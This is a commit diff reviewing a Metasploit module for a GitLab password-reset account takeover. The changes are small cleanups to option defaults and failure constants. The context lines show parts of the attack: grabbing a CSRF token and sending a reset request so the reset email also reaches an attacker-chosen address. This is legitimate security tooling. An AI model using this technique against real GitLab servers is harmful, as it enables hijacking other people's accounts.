gitlab password reset account takeoever review

h00die · h00die · commit e6c4195ad39c · 2024-01-27T07:42:25.000-05:00
diff --git a/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb b/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb
@@ -44,8 +44,8 @@ def initialize
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('TARGETEMAIL', [ true, 'The email address to compromise', '' ]),
-        OptString.new('MYEMAIL', [ true, 'An email address to also send the password reset email to', '' ]),
+        OptString.new('TARGETEMAIL', [ true, 'The email address to compromise' ]),
+        OptString.new('MYEMAIL', [ true, 'An email address to also send the password reset email to' ]),
         OptString.new('TARGETURI', [true, 'The path to GitLab', '/'])
       ]
     )
@@ -59,7 +59,7 @@ def run_host(_ip)
       'uri' => normalize_uri(target_uri, 'users', 'sign_in')
     )
 
-    fail_with(Msf::Module::Failure::Unreachable, 'No response received') if res.nil?
+    fail_with(Failure::Unreachable, 'No response received') if res.nil?
 
     fail_with(Failure::UnexpectedReply, 'Unable to find CSRF token') unless res.body =~ %r{<meta name="csrf-token" content="([^"]+)" />}
     print_good("CSRF Token: #{::Regexp.last_match(1)}")
@@ -74,7 +74,7 @@ def run_host(_ip)
         "authenticity_token=#{::Regexp.last_match(1)}"
       ].join('&')
     )
-    fail_with(Msf::Module::Failure::Unreachable, 'No response received') if res.nil?
+    fail_with(Failure::Unreachable, 'No response received') if res.nil?
 
     if res.code == 302
       print_good("Sent, check #{datastore['MYEMAIL']} for a possible password reset link (failure is blind)")

Original file line number	Diff line number	Diff line change
`@@ -44,8 +44,8 @@ def initialize`
`44`	`44`	`register_options(`
`45`	`45`	`[`
`46`	`46`	`Opt::RPORT(80),`
`47`		`- OptString.new('TARGETEMAIL', [ true, 'The email address to compromise', '' ]),`
`48`		`- OptString.new('MYEMAIL', [ true, 'An email address to also send the password reset email to', '' ]),`
	`47`	`+ OptString.new('TARGETEMAIL', [ true, 'The email address to compromise' ]),`
	`48`	`+ OptString.new('MYEMAIL', [ true, 'An email address to also send the password reset email to' ]),`
`49`	`49`	`OptString.new('TARGETURI', [true, 'The path to GitLab', '/'])`
`50`	`50`	`]`
`51`	`51`	`)`
`@@ -59,7 +59,7 @@ def run_host(_ip)`
`59`	`59`	`'uri' => normalize_uri(target_uri, 'users', 'sign_in')`
`60`	`60`	`)`
`61`	`61`
`62`		`- fail_with(Msf::Module::Failure::Unreachable, 'No response received') if res.nil?`
	`62`	`+ fail_with(Failure::Unreachable, 'No response received') if res.nil?`
`63`	`63`
`64`	`64`	`fail_with(Failure::UnexpectedReply, 'Unable to find CSRF token') unless res.body =~ %r{<meta name="csrf-token" content="([^"]+)" />}`
`65`	`65`	`print_good("CSRF Token: #{::Regexp.last_match(1)}")`
`@@ -74,7 +74,7 @@ def run_host(_ip)`
`74`	`74`	`"authenticity_token=#{::Regexp.last_match(1)}"`
`75`	`75`	`].join('&')`
`76`	`76`	`)`
`77`		`- fail_with(Msf::Module::Failure::Unreachable, 'No response received') if res.nil?`
	`77`	`+ fail_with(Failure::Unreachable, 'No response received') if res.nil?`
`78`	`78`
`79`	`79`	`if res.code == 302`
`80`	`80`	`print_good("Sent, check #{datastore['MYEMAIL']} for a possible password reset link (failure is blind)")`